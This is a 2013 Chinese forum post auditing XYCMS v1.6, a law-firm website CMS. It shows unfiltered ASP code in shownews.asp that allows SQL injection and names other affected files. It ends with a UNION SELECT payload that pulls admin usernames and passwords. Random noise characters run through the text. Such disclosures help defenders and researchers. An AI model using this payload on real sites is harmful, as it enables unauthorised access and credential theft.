前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
9 I6 @2 h4 Q. r! w1 E8 B- L1 h
1 u0 K, g. R% {" H! D7 L淫荡分割线( l- n1 I a) A3 a
--------------------------------------------------------) g9 y5 q* Q; r* D* [& S
: ~5 h4 U) e- ?# L& {9 j$ X审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)! ^1 Q/ z, K& e5 R- Y# Z5 Y
源码地址:http://down.chinaz.com/soft/29233.htm
) h. |' K$ }- b* Y/ M 5 o1 k# {3 L, L' `' k6 L
漏洞文件:shownews.asp
9 x1 j. N' s4 U, a漏洞代码:7-13行3 W8 ^* f R, w3 R4 `
6 k) m. a/ n) d* U5 L 9 A e" K4 y5 b% B8 P m) y
<% ( N/ I/ d3 ~* j7 B9 }
id=request.QueryString("id")
A8 Y i" B' C- l* t+ q
* Q2 A& N9 N* Sset snews=server.createobject("adodb.recordset")
! R: F3 X' g3 S6 V0 P+ W+ m$ yexec="select * from [news] where id="&id9 W$ Z( [; J( [ W4 `# F+ ]* t
snews.open exec,conn,1,1( `% Q' P; t/ `6 G6 w8 H9 l/ E( H
%>
7 s% Q7 u+ X4 h1 Q2 ^" }! ?0 ^ 3 M/ u1 ]9 T1 a3 A
! G+ I7 O- c& o0 F8 E) X0 P5 p$ z
什么过滤都没有 直造成注入9 _$ [; v; [$ r5 ]' a( H- I. A7 h
) i3 F% X6 x1 @: J; ` \+ i) m注入点:http://127.0.0.1:99/shownews.asp?id=xx: |8 t7 b h+ Q: ~/ d" e* N
4 R6 n, I& I ~+ t: ]+ I
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
0 G/ \3 F1 A$ N4 e: _# c( ?7 j
- }7 j. w: U/ {4 A4 V 9 k8 Z; E" y7 {7 \* Q
exp: union select 1,admin,password,4,5,7 from admin_user. y% Q8 _- e9 Z* L% O
* Z$ h3 s& w+ K3 j5 e1 Z+ G0 b( C6 n |
发表于 2013-4-4 17:28:12
收藏
支持
反对